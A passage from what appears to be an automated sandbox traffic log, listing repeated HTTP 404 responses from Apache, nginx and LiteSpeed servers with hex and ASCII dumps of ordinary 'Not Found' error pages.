73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:51:42 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:51:44 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:51:59 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:52:02 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:52:04 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:52:29 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:52:32 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:52:35 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:52:38 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
